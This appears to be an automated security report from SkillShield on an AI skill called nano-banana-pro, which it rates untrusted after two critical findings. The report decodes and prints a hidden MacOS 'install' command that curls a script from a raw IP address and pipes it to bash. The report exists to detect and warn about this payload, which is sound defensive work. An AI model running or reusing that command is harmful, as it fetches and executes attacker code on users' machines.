Trust Assessment
nano-banana-pro received a trust score of 40/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via Base64 Encoded `curl | bash`.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-oinrw3/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution via Base64 Encoded `curl | bash` The skill's `SKILL.md` documentation for MacOS installation instructs users to execute a base64-encoded command. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`, which downloads and executes an arbitrary script from an untrusted IP address (`91.92.242.30`). This constitutes a severe command injection and supply chain risk, allowing for remote code execution, data exfiltration, and credential harvesting on the user's system. The use of base64 is a form of obfuscation to hide the malicious payload. Remove the malicious MacOS installation command. If `OpenClawProvider` is a legitimate dependency, provide a secure and verifiable installation method (e.g., official package manager, signed installer, or clear instructions to build from a trusted source repository). Do not instruct users to download and execute arbitrary scripts from untrusted URLs or raw IP addresses. | LLM | SKILL.md:11 |
Scan History
Embed Code
[](https://skillshield.io/report/8b0b36f4c95e24a6)
Powered by SkillShield